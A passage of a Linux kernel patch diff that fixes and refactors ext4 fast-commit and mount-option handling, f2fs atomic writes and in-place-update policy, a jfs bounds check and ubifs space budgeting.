+@@ -1506,8 +1514,8 @@ static int ext4_fc_record_modified_inode(struct super_block *sb, int ino)
+ /*
+  * Inode replay function
+  */
+-static int ext4_fc_replay_inode(struct super_block *sb, struct ext4_fc_tl *tl,
+-				u8 *val)
++static int ext4_fc_replay_inode(struct super_block *sb,
++				struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct ext4_fc_inode fc_inode;
+ 	struct ext4_inode *raw_inode;
+@@ -1609,8 +1617,8 @@ out:
+  * inode for which we are trying to create a dentry here, should already have
+  * been replayed before we start here.
+  */
+-static int ext4_fc_replay_create(struct super_block *sb, struct ext4_fc_tl *tl,
+-				 u8 *val)
++static int ext4_fc_replay_create(struct super_block *sb,
++				 struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	int ret = 0;
+ 	struct inode *inode = NULL;
+@@ -1708,7 +1716,7 @@ int ext4_fc_record_regions(struct super_block *sb, int ino,
+ 
+ /* Replay add range tag */
+ static int ext4_fc_replay_add_range(struct super_block *sb,
+-				    struct ext4_fc_tl *tl, u8 *val)
++				    struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct ext4_fc_add_range fc_add_ex;
+ 	struct ext4_extent newex, *ex;
+@@ -1828,8 +1836,8 @@ out:
+ 
+ /* Replay DEL_RANGE tag */
+ static int
+-ext4_fc_replay_del_range(struct super_block *sb, struct ext4_fc_tl *tl,
+-			 u8 *val)
++ext4_fc_replay_del_range(struct super_block *sb,
++			 struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct inode *inode;
+ 	struct ext4_fc_del_range lrange;
+@@ -2025,7 +2033,7 @@ static int ext4_fc_replay_scan(journal_t *journal,
+ 	struct ext4_fc_replay_state *state;
+ 	int ret = JBD2_FC_REPLAY_CONTINUE;
+ 	struct ext4_fc_add_range ext;
+-	struct ext4_fc_tl tl;
++	struct ext4_fc_tl_mem tl;
+ 	struct ext4_fc_tail tail;
+ 	__u8 *start, *end, *cur, *val;
+ 	struct ext4_fc_head head;
+@@ -2144,7 +2152,7 @@ static int ext4_fc_replay(journal_t *journal, struct buffer_head *bh,
+ {
+ 	struct super_block *sb = journal->j_private;
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+-	struct ext4_fc_tl tl;
++	struct ext4_fc_tl_mem tl;
+ 	__u8 *start, *end, *cur, *val;
+ 	int ret = JBD2_FC_REPLAY_CONTINUE;
+ 	struct ext4_fc_replay_state *state = &sbi->s_fc_replay_state;
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 260c1b3e3ef2c..c81fa0fa9901a 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -2146,7 +2146,7 @@ static int ext4_parse_param(struct fs_context *fc, struct fs_parameter *param)
+ 		return 0;
+ 	case Opt_commit:
+ 		if (result.uint_32 == 0)
+-			ctx->s_commit_interval = JBD2_DEFAULT_MAX_COMMIT_AGE;
++			result.uint_32 = JBD2_DEFAULT_MAX_COMMIT_AGE;
+ 		else if (result.uint_32 > INT_MAX / HZ) {
+ 			ext4_msg(NULL, KERN_ERR,
+ 				 "Invalid commit interval %d, "
+@@ -2894,7 +2894,7 @@ static int _ext4_show_options(struct seq_file *seq, struct super_block *sb,
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	struct ext4_super_block *es = sbi->s_es;
+-	int def_errors, def_mount_opt = sbi->s_def_mount_opt;
++	int def_errors;
+ 	const struct mount_opts *m;
+ 	char sep = nodefs ? '\n' : ',';
+ 
+@@ -2906,15 +2906,28 @@ static int _ext4_show_options(struct seq_file *seq, struct super_block *sb,
+ 
+ 	for (m = ext4_mount_opts; m->token != Opt_err; m++) {
+ 		int want_set = m->flags & MOPT_SET;
++		int opt_2 = m->flags & MOPT_2;
++		unsigned int mount_opt, def_mount_opt;
++
+ 		if (((m->flags & (MOPT_SET|MOPT_CLEAR)) == 0) ||
+ 		    m->flags & MOPT_SKIP)
+ 			continue;
+-		if (!nodefs && !(m->mount_opt & (sbi->s_mount_opt ^ def_mount_opt)))
+-			continue; /* skip if same as the default */
++
++		if (opt_2) {
++			mount_opt = sbi->s_mount_opt2;
++			def_mount_opt = sbi->s_def_mount_opt2;
++		} else {
++			mount_opt = sbi->s_mount_opt;
++			def_mount_opt = sbi->s_def_mount_opt;
++		}
++		/* skip if same as the default */
++		if (!nodefs && !(m->mount_opt & (mount_opt ^ def_mount_opt)))
++			continue;
++		/* select Opt_noFoo vs Opt_Foo */
+ 		if ((want_set &&
+-		     (sbi->s_mount_opt & m->mount_opt) != m->mount_opt) ||
+-		    (!want_set && (sbi->s_mount_opt & m->mount_opt)))
+-			continue; /* select Opt_noFoo vs Opt_Foo */
++		     (mount_opt & m->mount_opt) != m->mount_opt) ||
++		    (!want_set && (mount_opt & m->mount_opt)))
++			continue;
+ 		SEQ_OPTS_PRINT("%s", token2str(m->token));
+ 	}
+ 
+@@ -2942,7 +2955,7 @@ static int _ext4_show_options(struct seq_file *seq, struct super_block *sb,
+ 	if (nodefs || sbi->s_stripe)
+ 		SEQ_OPTS_PRINT("stripe=%lu", sbi->s_stripe);
+ 	if (nodefs || EXT4_MOUNT_DATA_FLAGS &
+-			(sbi->s_mount_opt ^ def_mount_opt)) {
++			(sbi->s_mount_opt ^ sbi->s_def_mount_opt)) {
+ 		if (test_opt(sb, DATA_FLAGS) == EXT4_MOUNT_JOURNAL_DATA)
+ 			SEQ_OPTS_PUTS("data=journal");
+ 		else if (test_opt(sb, DATA_FLAGS) == EXT4_MOUNT_ORDERED_DATA)
+@@ -5086,6 +5099,7 @@ static int __ext4_fill_super(struct fs_context *fc, struct super_block *sb)
+ 		goto failed_mount;
+ 
+ 	sbi->s_def_mount_opt = sbi->s_mount_opt;
++	sbi->s_def_mount_opt2 = sbi->s_mount_opt2;
+ 
+ 	err = ext4_check_opt_consistency(fc, sb);
+ 	if (err < 0)
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index 8cca566baf3ab..a28d05895f5c7 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -2535,34 +2535,29 @@ static inline bool check_inplace_update_policy(struct inode *inode,
+ 				struct f2fs_io_info *fio)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	unsigned int policy = SM_I(sbi)->ipu_policy;
+ 
+-	if (policy & (0x1 << F2FS_IPU_HONOR_OPU_WRITE) &&
+-			is_inode_flag_set(inode, FI_OPU_WRITE))
++	if (IS_F2FS_IPU_HONOR_OPU_WRITE(sbi) &&
++	    is_inode_flag_set(inode, FI_OPU_WRITE))
+ 		return false;
+-	if (policy & (0x1 << F2FS_IPU_FORCE))
++	if (IS_F2FS_IPU_FORCE(sbi))
+ 		return true;
+-	if (policy & (0x1 << F2FS_IPU_SSR) && f2fs_need_SSR(sbi))
++	if (IS_F2FS_IPU_SSR(sbi) && f2fs_need_SSR(sbi))
+ 		return true;
+-	if (policy & (0x1 << F2FS_IPU_UTIL) &&
+-			utilization(sbi) > SM_I(sbi)->min_ipu_util)
++	if (IS_F2FS_IPU_UTIL(sbi) && utilization(sbi) > SM_I(sbi)->min_ipu_util)
+ 		return true;
+-	if (policy & (0x1 << F2FS_IPU_SSR_UTIL) && f2fs_need_SSR(sbi) &&
+-			utilization(sbi) > SM_I(sbi)->min_ipu_util)
++	if (IS_F2FS_IPU_SSR_UTIL(sbi) && f2fs_need_SSR(sbi) &&
++	    utilization(sbi) > SM_I(sbi)->min_ipu_util)
+ 		return true;
+ 
+ 	/*
+ 	 * IPU for rewrite async pages
+ 	 */
+-	if (policy & (0x1 << F2FS_IPU_ASYNC) &&
+-			fio && fio->op == REQ_OP_WRITE &&
+-			!(fio->op_flags & REQ_SYNC) &&
+-			!IS_ENCRYPTED(inode))
++	if (IS_F2FS_IPU_ASYNC(sbi) && fio && fio->op == REQ_OP_WRITE &&
++	    !(fio->op_flags & REQ_SYNC) && !IS_ENCRYPTED(inode))
+ 		return true;
+ 
+ 	/* this is only set during fdatasync */
+-	if (policy & (0x1 << F2FS_IPU_FSYNC) &&
+-			is_inode_flag_set(inode, FI_NEED_IPU))
++	if (IS_F2FS_IPU_FSYNC(sbi) && is_inode_flag_set(inode, FI_NEED_IPU))
+ 		return true;
+ 
+ 	if (unlikely(fio && is_sbi_flag_set(sbi, SBI_CP_DISABLED) &&
+@@ -4155,20 +4150,24 @@ static int f2fs_iomap_begin(struct inode *inode, loff_t offset, loff_t length,
+ 	 */
+ 	map.m_len = fscrypt_limit_io_blocks(inode, map.m_lblk, map.m_len);
+ 
+-	if (map.m_flags & (F2FS_MAP_MAPPED | F2FS_MAP_UNWRITTEN)) {
+-		iomap->length = blks_to_bytes(inode, map.m_len);
+-		if (map.m_flags & F2FS_MAP_MAPPED) {
+-			iomap->type = IOMAP_MAPPED;
+-			iomap->flags |= IOMAP_F_MERGED;
+-		} else {
+-			iomap->type = IOMAP_UNWRITTEN;
+-		}
+-		if (WARN_ON_ONCE(!__is_valid_data_blkaddr(map.m_pblk)))
+-			return -EINVAL;
++	/*
++	 * We should never see delalloc or compressed extents here based on
++	 * prior flushing and checks.
++	 */
++	if (WARN_ON_ONCE(map.m_pblk == NEW_ADDR))
++		return -EINVAL;
++	if (WARN_ON_ONCE(map.m_pblk == COMPRESS_ADDR))
++		return -EINVAL;
+ 
++	if (map.m_pblk != NULL_ADDR) {
++		iomap->length = blks_to_bytes(inode, map.m_len);
++		iomap->type = IOMAP_MAPPED;
++		iomap->flags |= IOMAP_F_MERGED;
+ 		iomap->bdev = map.m_bdev;
+ 		iomap->addr = blks_to_bytes(inode, map.m_pblk);
+ 	} else {
++		if (flags & IOMAP_WRITE)
++			return -ENOTBLK;
+ 		iomap->length = blks_to_bytes(inode, next_pgofs) -
+ 				iomap->offset;
+ 		iomap->type = IOMAP_HOLE;
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index ecbc8c135b494..05297427552ac 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -619,7 +619,7 @@ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+ 		fofs = f2fs_start_bidx_of_node(ofs_of_node(dn->node_page),
+ 							dn->inode) + ofs;
+ 		f2fs_update_read_extent_cache_range(dn, fofs, 0, len);
+-		f2fs_update_age_extent_cache_range(dn, fofs, nr_free);
++		f2fs_update_age_extent_cache_range(dn, fofs, len);
+ 		dec_valid_block_count(sbi, dn->inode, nr_free);
+ 	}
+ 	dn->ofs_in_node = ofs;
+@@ -1498,6 +1498,7 @@ static int f2fs_do_zero_range(struct dnode_of_data *dn, pgoff_t start,
+ 	}
+ 
+ 	f2fs_update_read_extent_cache_range(dn, start, 0, index - start);
++	f2fs_update_age_extent_cache_range(dn, start, index - start);
+ 
+ 	return ret;
+ }
+@@ -1866,7 +1867,10 @@ static int f2fs_release_file(struct inode *inode, struct file *filp)
+ 			atomic_read(&inode->i_writecount) != 1)
+ 		return 0;
+ 
++	inode_lock(inode);
+ 	f2fs_abort_atomic_write(inode, true);
++	inode_unlock(inode);
++
+ 	return 0;
+ }
+ 
+@@ -1880,8 +1884,13 @@ static int f2fs_file_flush(struct file *file, fl_owner_t id)
+ 	 * until all the writers close its file. Since this should be done
+ 	 * before dropping file lock, it needs to do in ->flush.
+ 	 */
+-	if (F2FS_I(inode)->atomic_write_task == current)
++	if (F2FS_I(inode)->atomic_write_task == current &&
++				(current->flags & PF_EXITING)) {
++		inode_lock(inode);
+ 		f2fs_abort_atomic_write(inode, true);
++		inode_unlock(inode);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -2087,19 +2096,28 @@ static int f2fs_ioc_start_atomic_write(struct file *filp, bool truncate)
+ 		goto out;
+ 	}
+ 
+-	/* Create a COW inode for atomic write */
+-	pinode = f2fs_iget(inode->i_sb, fi->i_pino);
+-	if (IS_ERR(pinode)) {
+-		f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
+-		ret = PTR_ERR(pinode);
+-		goto out;
+-	}
++	/* Check if the inode already has a COW inode */
++	if (fi->cow_inode == NULL) {
++		/* Create a COW inode for atomic write */
++		pinode = f2fs_iget(inode->i_sb, fi->i_pino);
++		if (IS_ERR(pinode)) {
++			f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
++			ret = PTR_ERR(pinode);
++			goto out;
++		}
+ 
+-	ret = f2fs_get_tmpfile(mnt_userns, pinode, &fi->cow_inode);
+-	iput(pinode);
+-	if (ret) {
+-		f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
+-		goto out;
++		ret = f2fs_get_tmpfile(mnt_userns, pinode, &fi->cow_inode);
++		iput(pinode);
++		if (ret) {
++			f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
++			goto out;
++		}
++
++		set_inode_flag(fi->cow_inode, FI_COW_FILE);
++		clear_inode_flag(fi->cow_inode, FI_INLINE_DATA);
++	} else {
++		/* Reuse the already created COW inode */
++		f2fs_do_truncate_blocks(fi->cow_inode, 0, true);
+ 	}
+ 
+ 	f2fs_write_inode(inode, NULL);
+@@ -2107,8 +2125,6 @@ static int f2fs_ioc_start_atomic_write(struct file *filp, bool truncate)
+ 	stat_inc_atomic_inode(inode);
+ 
+ 	set_inode_flag(inode, FI_ATOMIC_FILE);
+-	set_inode_flag(fi->cow_inode, FI_COW_FILE);
+-	clear_inode_flag(fi->cow_inode, FI_INLINE_DATA);
+ 
+ 	isize = i_size_read(inode);
+ 	fi->original_i_size = isize;
+@@ -2338,6 +2354,7 @@ static int f2fs_ioc_get_encryption_pwsalt(struct file *filp, unsigned long arg)
+ {
+ 	struct inode *inode = file_inode(filp);
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
++	u8 encrypt_pw_salt[16];
+ 	int err;
+ 
+ 	if (!f2fs_sb_has_encrypt(sbi))
+@@ -2362,12 +2379,14 @@ static int f2fs_ioc_get_encryption_pwsalt(struct file *filp, unsigned long arg)
+ 		goto out_err;
+ 	}
+ got_it:
+-	if (copy_to_user((__u8 __user *)arg, sbi->raw_super->encrypt_pw_salt,
+-									16))
+-		err = -EFAULT;
++	memcpy(encrypt_pw_salt, sbi->raw_super->encrypt_pw_salt, 16);
+ out_err:
+ 	f2fs_up_write(&sbi->sb_lock);
+ 	mnt_drop_write_file(filp);
++
++	if (!err && copy_to_user((__u8 __user *)arg, encrypt_pw_salt, 16))
++		err = -EFAULT;
++
+ 	return err;
+ }
+ 
+@@ -3942,7 +3961,7 @@ static int f2fs_ioc_set_compress_option(struct file *filp, unsigned long arg)
+ 		goto out;
+ 	}
+ 
+-	if (inode->i_size != 0) {
++	if (F2FS_HAS_BLOCKS(inode)) {
+ 		ret = -EFBIG;
+ 		goto out;
+ 	}
+@@ -4823,6 +4842,7 @@ long f2fs_compat_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
+ 	case F2FS_IOC32_MOVE_RANGE:
+ 		return f2fs_compat_ioc_move_range(file, arg);
+ 	case F2FS_IOC_START_ATOMIC_WRITE:
++	case F2FS_IOC_START_ATOMIC_REPLACE:
+ 	case F2FS_IOC_COMMIT_ATOMIC_WRITE:
+ 	case F2FS_IOC_START_VOLATILE_WRITE:
+ 	case F2FS_IOC_RELEASE_VOLATILE_WRITE:
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index fb489f55fef3a..f438f39ae3f3e 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -413,12 +413,6 @@ static int do_read_inode(struct inode *inode)
+ 		fi->i_inline_xattr_size = 0;
+ 	}
+ 
+-	if (!sanity_check_inode(inode, node_page)) {
+-		f2fs_put_page(node_page, 1);
+-		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
+-		return -EFSCORRUPTED;
+-	}
+-
+ 	/* check data exist */
+ 	if (f2fs_has_inline_data(inode) && !f2fs_exist_data(inode))
+ 		__recover_inline_status(inode, node_page);
+@@ -482,6 +476,12 @@ static int do_read_inode(struct inode *inode)
+ 	f2fs_init_read_extent_tree(inode, node_page);
+ 	f2fs_init_age_extent_tree(inode);
+ 
++	if (!sanity_check_inode(inode, node_page)) {
++		f2fs_put_page(node_page, 1);
++		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
++		return -EFSCORRUPTED;
++	}
++
+ 	f2fs_put_page(node_page, 1);
+ 
+ 	stat_inc_inline_xattr(inode);
+@@ -767,11 +767,18 @@ int f2fs_write_inode(struct inode *inode, struct writeback_control *wbc)
+ void f2fs_evict_inode(struct inode *inode)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	nid_t xnid = F2FS_I(inode)->i_xattr_nid;
++	struct f2fs_inode_info *fi = F2FS_I(inode);
++	nid_t xnid = fi->i_xattr_nid;
+ 	int err = 0;
+ 
+ 	f2fs_abort_atomic_write(inode, true);
+ 
++	if (fi->cow_inode) {
++		clear_inode_flag(fi->cow_inode, FI_COW_FILE);
++		iput(fi->cow_inode);
++		fi->cow_inode = NULL;
++	}
++
+ 	trace_f2fs_evict_inode(inode);
+ 	truncate_inode_pages_final(&inode->i_data);
+ 
+@@ -858,7 +865,7 @@ no_delete:
+ 	stat_dec_inline_inode(inode);
+ 	stat_dec_compr_inode(inode);
+ 	stat_sub_compr_blocks(inode,
+-			atomic_read(&F2FS_I(inode)->i_compr_blocks));
++			atomic_read(&fi->i_compr_blocks));
+ 
+ 	if (likely(!f2fs_cp_error(sbi) &&
+ 				!is_sbi_flag_set(sbi, SBI_CP_DISABLED)))
+diff --git a/fs/f2fs/iostat.c b/fs/f2fs/iostat.c
+index 3166a8939ed4f..02393c95c9f86 100644
+--- a/fs/f2fs/iostat.c
++++ b/fs/f2fs/iostat.c
+@@ -227,8 +227,12 @@ static inline void __update_iostat_latency(struct bio_iostat_ctx *iostat_ctx,
+ 		return;
+ 
+ 	ts_diff = jiffies - iostat_ctx->submit_ts;
+-	if (iotype >= META_FLUSH)
++	if (iotype == META_FLUSH) {
+ 		iotype = META;
++	} else if (iotype >= NR_PAGE_TYPE) {
++		f2fs_warn(sbi, "%s: %d over NR_PAGE_TYPE", __func__, iotype);
++		return;
++	}
+ 
+ 	if (rw == 0) {
+ 		idx = READ_IO;
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index b019f63fd5403..269f89d202c61 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -192,18 +192,18 @@ void f2fs_abort_atomic_write(struct inode *inode, bool clean)
+ 	if (!f2fs_is_atomic_file(inode))
+ 		return;
+ 
+-	clear_inode_flag(fi->cow_inode, FI_COW_FILE);
+-	iput(fi->cow_inode);
+-	fi->cow_inode = NULL;
+ 	release_atomic_write_cnt(inode);
+ 	clear_inode_flag(inode, FI_ATOMIC_COMMITTED);
+ 	clear_inode_flag(inode, FI_ATOMIC_REPLACE);
+ 	clear_inode_flag(inode, FI_ATOMIC_FILE);
+ 	stat_dec_atomic_inode(inode);
+ 
++	F2FS_I(inode)->atomic_write_task = NULL;
++
+ 	if (clean) {
+ 		truncate_inode_pages_final(inode->i_mapping);
+ 		f2fs_i_size_write(inode, fi->original_i_size);
++		fi->original_i_size = 0;
+ 	}
+ }
+ 
+@@ -255,6 +255,9 @@ retry:
+ 	}
+ 
+ 	f2fs_put_dnode(&dn);
++
++	trace_f2fs_replace_atomic_write_block(inode, F2FS_I(inode)->cow_inode,
++					index, *old_addr, new_addr, recover);
+ 	return 0;
+ }
+ 
+@@ -3492,7 +3495,7 @@ int f2fs_inplace_write_data(struct f2fs_io_info *fio)
+ 
+ 	stat_inc_inplace_blocks(fio->sbi);
+ 
+-	if (fio->bio && !(SM_I(sbi)->ipu_policy & (1 << F2FS_IPU_NOCACHE)))
++	if (fio->bio && !IS_F2FS_IPU_NOCACHE(sbi))
+ 		err = f2fs_merge_page_bio(fio);
+ 	else
+ 		err = f2fs_submit_page_bio(fio);
+@@ -5131,7 +5134,7 @@ int f2fs_build_segment_manager(struct f2fs_sb_info *sbi)
+ 		sm_info->rec_prefree_segments = DEF_MAX_RECLAIM_PREFREE_SEGMENTS;
+ 
+ 	if (!f2fs_lfs_mode(sbi))
+-		sm_info->ipu_policy = 1 << F2FS_IPU_FSYNC;
++		sm_info->ipu_policy = BIT(F2FS_IPU_FSYNC);
+ 	sm_info->min_ipu_util = DEF_MIN_IPU_UTIL;
+ 	sm_info->min_fsync_blocks = DEF_MIN_FSYNC_BLOCKS;
+ 	sm_info->min_seq_blocks = sbi->blocks_per_seg;
+diff --git a/fs/f2fs/segment.h b/fs/f2fs/segment.h
+index 3ad1b7b6fa946..6eb5922a25361 100644
+--- a/fs/f2fs/segment.h
++++ b/fs/f2fs/segment.h
+@@ -670,6 +670,8 @@ static inline int utilization(struct f2fs_sb_info *sbi)
+ 
+ #define SMALL_VOLUME_SEGMENTS	(16 * 512)	/* 16GB */
+ 
++#define F2FS_IPU_DISABLE	0
++
+ enum {
+ 	F2FS_IPU_FORCE,
+ 	F2FS_IPU_SSR,
+@@ -679,8 +681,29 @@ enum {
+ 	F2FS_IPU_ASYNC,
+ 	F2FS_IPU_NOCACHE,
+ 	F2FS_IPU_HONOR_OPU_WRITE,
++	F2FS_IPU_MAX,
+ };
+ 
++static inline bool IS_F2FS_IPU_DISABLE(struct f2fs_sb_info *sbi)
++{
++	return SM_I(sbi)->ipu_policy == F2FS_IPU_DISABLE;
++}
++
++#define F2FS_IPU_POLICY(name)					\
++static inline bool IS_##name(struct f2fs_sb_info *sbi)		\
++{								\
++	return SM_I(sbi)->ipu_policy & BIT(name);		\
++}
++
++F2FS_IPU_POLICY(F2FS_IPU_FORCE);
++F2FS_IPU_POLICY(F2FS_IPU_SSR);
++F2FS_IPU_POLICY(F2FS_IPU_UTIL);
++F2FS_IPU_POLICY(F2FS_IPU_SSR_UTIL);
++F2FS_IPU_POLICY(F2FS_IPU_FSYNC);
++F2FS_IPU_POLICY(F2FS_IPU_ASYNC);
++F2FS_IPU_POLICY(F2FS_IPU_NOCACHE);
++F2FS_IPU_POLICY(F2FS_IPU_HONOR_OPU_WRITE);
++
+ static inline unsigned int curseg_segno(struct f2fs_sb_info *sbi,
+ 		int type)
+ {
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 1f812b9ce985b..551468dad3275 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -1347,12 +1347,12 @@ default_check:
+ 	}
+ 
+ 	if (test_opt(sbi, DISABLE_CHECKPOINT) && f2fs_lfs_mode(sbi)) {
+-		f2fs_err(sbi, "LFS not compatible with checkpoint=disable");
++		f2fs_err(sbi, "LFS is not compatible with checkpoint=disable");
+ 		return -EINVAL;
+ 	}
+ 
+ 	if (test_opt(sbi, ATGC) && f2fs_lfs_mode(sbi)) {
+-		f2fs_err(sbi, "LFS not compatible with ATGC");
++		f2fs_err(sbi, "LFS is not compatible with ATGC");
+ 		return -EINVAL;
+ 	}
+ 
+@@ -1430,8 +1430,6 @@ static int f2fs_drop_inode(struct inode *inode)
+ 			atomic_inc(&inode->i_count);
+ 			spin_unlock(&inode->i_lock);
+ 
+-			f2fs_abort_atomic_write(inode, true);
+-
+ 			/* should remain fi->extent_tree for writepage */
+ 			f2fs_destroy_extent_node(inode);
+ 
+@@ -2306,6 +2304,12 @@ static int f2fs_remount(struct super_block *sb, int *flags, char *data)
+ 		}
+ 	}
+ #endif
++	if (f2fs_lfs_mode(sbi) && !IS_F2FS_IPU_DISABLE(sbi)) {
++		err = -EINVAL;
++		f2fs_warn(sbi, "LFS is not compatible with IPU");
++		goto restore_opts;
++	}
++
+ 	/* disallow enable atgc dynamically */
+ 	if (no_atgc == !!test_opt(sbi, ATGC)) {
+ 		err = -EINVAL;
+@@ -4089,8 +4093,9 @@ static void f2fs_tuning_parameters(struct f2fs_sb_info *sbi)
+ 		if (f2fs_block_unit_discard(sbi))
+ 			SM_I(sbi)->dcc_info->discard_granularity =
+ 						MIN_DISCARD_GRANULARITY;
+-		SM_I(sbi)->ipu_policy = 1 << F2FS_IPU_FORCE |
+-					1 << F2FS_IPU_HONOR_OPU_WRITE;
++		if (!f2fs_lfs_mode(sbi))
++			SM_I(sbi)->ipu_policy = BIT(F2FS_IPU_FORCE) |
++						BIT(F2FS_IPU_HONOR_OPU_WRITE);
+ 	}
+ 
+ 	sbi->readdir_ra = true;
+diff --git a/fs/f2fs/sysfs.c b/fs/f2fs/sysfs.c
+index 83a366f3ee80e..088b816127ecb 100644
+--- a/fs/f2fs/sysfs.c
++++ b/fs/f2fs/sysfs.c
+@@ -686,6 +686,15 @@ out:
+ 		return count;
+ 	}
+ 
++	if (!strcmp(a->attr.name, "ipu_policy")) {
++		if (t >= BIT(F2FS_IPU_MAX))
++			return -EINVAL;
++		if (t && f2fs_lfs_mode(sbi))
++			return -EINVAL;
++		SM_I(sbi)->ipu_policy = (unsigned int)t;
++		return count;
++	}
++
+ 	*ui = (unsigned int)t;
+ 
+ 	return count;
+diff --git a/fs/f2fs/verity.c b/fs/f2fs/verity.c
+index c352fff88a5e6..3f4f3295f1c66 100644
+--- a/fs/f2fs/verity.c
++++ b/fs/f2fs/verity.c
+@@ -81,7 +81,7 @@ static int pagecache_write(struct inode *inode, const void *buf, size_t count,
+ 		size_t n = min_t(size_t, count,
+ 				 PAGE_SIZE - offset_in_page(pos));
+ 		struct page *page;
+-		void *fsdata;
++		void *fsdata = NULL;
+ 		int res;
+ 
+ 		res = aops->write_begin(NULL, mapping, pos, n, &page, &fsdata);
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index 765838578a722..a3eb1e8269477 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -193,7 +193,8 @@ int dbMount(struct inode *ipbmap)
+ 	bmp->db_agwidth = le32_to_cpu(dbmp_le->dn_agwidth);
+ 	bmp->db_agstart = le32_to_cpu(dbmp_le->dn_agstart);
+ 	bmp->db_agl2size = le32_to_cpu(dbmp_le->dn_agl2size);
+-	if (bmp->db_agl2size > L2MAXL2SIZE - L2MAXAG) {
++	if (bmp->db_agl2size > L2MAXL2SIZE - L2MAXAG ||
++	    bmp->db_agl2size < 0) {
+ 		err = -EINVAL;
+ 		goto err_release_metapage;
+ 	}
+diff --git a/fs/ubifs/budget.c b/fs/ubifs/budget.c
+index e8b9b756f0aca..d76eb7b39f564 100644
+--- a/fs/ubifs/budget.c
++++ b/fs/ubifs/budget.c
+@@ -209,11 +209,10 @@ long long ubifs_calc_available(const struct ubifs_info *c, int min_idx_lebs)
+ 	subtract_lebs += 1;
+ 
+ 	/*
+-	 * The GC journal head LEB is not really accessible. And since
+-	 * different write types go to different heads, we may count only on
+-	 * one head's space.
++	 * Since different write types go to different heads, we should
++	 * reserve one leb for each head.
+ 	 */
+-	subtract_lebs += c->jhead_cnt - 1;
++	subtract_lebs += c->jhead_cnt;
+ 
+ 	/* We also reserve one LEB for deletions, which bypass budgeting */
+ 	subtract_lebs += 1;
+@@ -400,7 +399,7 @@ static int calc_dd_growth(const struct ubifs_info *c,
+ 	dd_growth = req->dirtied_page ? c->bi.page_budget : 0;
+ 
+ 	if (req->dirtied_ino)
+-		dd_growth += c->bi.inode_budget << (req->dirtied_ino - 1);
++		dd_growth += c->bi.inode_budget * req->dirtied_ino;
+ 	if (req->mod_dent)
+ 		dd_growth += c->bi.dent_budget;
+ 	dd_growth += req->dirtied_ino_d;
+diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
+index 0f29cf2011361..5e6bcce94e641 100644
+--- a/fs/ubifs/dir.c
++++ b/fs/ubifs/dir.c
+@@ -1151,7 +1151,6 @@ static int ubifs_symlink(struct user_namespace *mnt_userns, struct inode *dir,
+ 	int err, sz_change, len = strlen(symname);
+ 	struct fscrypt_str disk_link;
+ 	struct ubifs_budget_req req = { .new_ino = 1, .new_dent = 1,
+-					.new_ino_d = ALIGN(len, 8),
+ 					.dirtied_ino = 1 };
+ 	struct fscrypt_name nm;
+ 
+@@ -1167,6 +1166,7 @@ static int ubifs_symlink(struct user_namespace *mnt_userns, struct inode *dir,
+ 	 * Budget request settings: new inode, new direntry and changing parent
+ 	 * directory inode.
+ 	 */
++	req.new_ino_d = ALIGN(disk_link.len - 1, 8);
+ 	err = ubifs_budget_space(c, &req);
+ 	if (err)
+ 		return err;
+@@ -1324,6 +1324,8 @@ static int do_rename(struct inode *old_dir, struct dentry *old_dentry,
+ 	if (unlink) {
+ 		ubifs_assert(c, inode_is_locked(new_inode));
+ 
++		/* Budget for old inode's data when its nlink > 1. */
++		req.dirtied_ino_d = ALIGN(ubifs_inode(new_inode)->data_len, 8);
+ 		err = ubifs_purge_xattrs(new_inode);
+ 		if (err)
+ 			return err;
+@@ -1576,6 +1578,10 @@ static int ubifs_xrename(struct inode *old_dir, struct dentry *old_dentry,
+ 		return err;
+ 	}
+ 
++	err = ubifs_budget_space(c, &req);
++	if (err)
++		goto out;
++
+ 	lock_4_inodes(old_dir, new_dir, NULL, NULL);
+ 
+ 	time = current_time(old_dir);
+@@ -1601,6 +1607,7 @@ static int ubifs_xrename(struct inode *old_dir, struct dentry *old_dentry,
+ 	unlock_4_inodes(old_dir, new_dir, NULL, NULL);
+ 	ubifs_release_budget(c, &req);
+ 
++out:
+ 	fscrypt_free_filename(&fst_nm);
+ 	fscrypt_free_filename(&snd_nm);
+ 	return err;
+diff --git a/fs/ubifs/file.c b/fs/ubifs/file.c
+index f2353dd676ef0..10c1779af9c51 100644
+--- a/fs/ubifs/file.c
++++ b/fs/ubifs/file.c
+@@ -1032,7 +1032,7 @@ static int ubifs_writepage(struct page *page, struct writeback_control *wbc)
